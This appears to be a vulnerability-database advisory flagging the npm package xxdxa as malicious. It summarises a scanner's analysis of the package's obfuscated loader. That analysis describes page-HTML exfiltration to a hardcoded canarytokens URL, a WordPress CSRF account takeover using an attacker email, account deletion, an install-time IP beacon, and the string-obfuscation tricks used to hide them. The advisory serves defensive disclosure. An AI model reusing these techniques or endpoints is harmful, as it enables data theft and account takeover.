VDB
KO

MAL-2026-10752

Malicious code in xxdxa (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (26a77171f4b68ff814a7a99b5e51e3d59b9d4ca41fefbd650d2a0f8412878360) The package's sole file i.js (declared as main) is a heavily obfuscated IIFE whose top-level exploit() runs unconditionally when the module is loaded. In a browser context on noviembrenacional.com it reads document.documentElement.outerHTML, base64-encodes it, and POSTs it (body 'type=page_html&data=...') to a hardcoded canarytokens.com endpoint (canarytokens.com/images/terms/e63c36xvesfv8udb0yiy1xztu/contact.php), along with status beacons (start, username, no_user_span, no_nonce, exploit_success, error). When the visitor is a logged-in WordPress user on that site whose username is neither 'JuanCuesta' nor 'noviembrenacional', it fetches /my-account/editar-cuenta/, extracts the save-account-details nonce and referer, and submits a same-origin CSRF POST that overwrites the victim's account email to nyxalor_25@proton.me, then triggers a password reset — an account takeover. For the 'noviembrenacional' admin user it instead POSTs to /members/<user>/settings/delete-account/. In Node (no window), the top-level call throws and the catch handler issues fetch(CANARY_URL + '?type=error&msg=...'), leaking a beacon (including the installer's public IP and an error string) to the attacker's canarytokens URL at require/import time. URLs, DOM property names, form field names, endpoints, and the attacker email are hidden via \uXXXX escapes, reversed-string decoding (e.g. '/srebmem/'.split('').reverse().join('') → '/members/'), and dead-code XOR expressions, existing solely to conceal the exfiltration destination and WordPress attack targets.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / xxdxa

No fixed version published yet for xxdxa (npm). Pin to a known-safe version or switch to an alternative.

References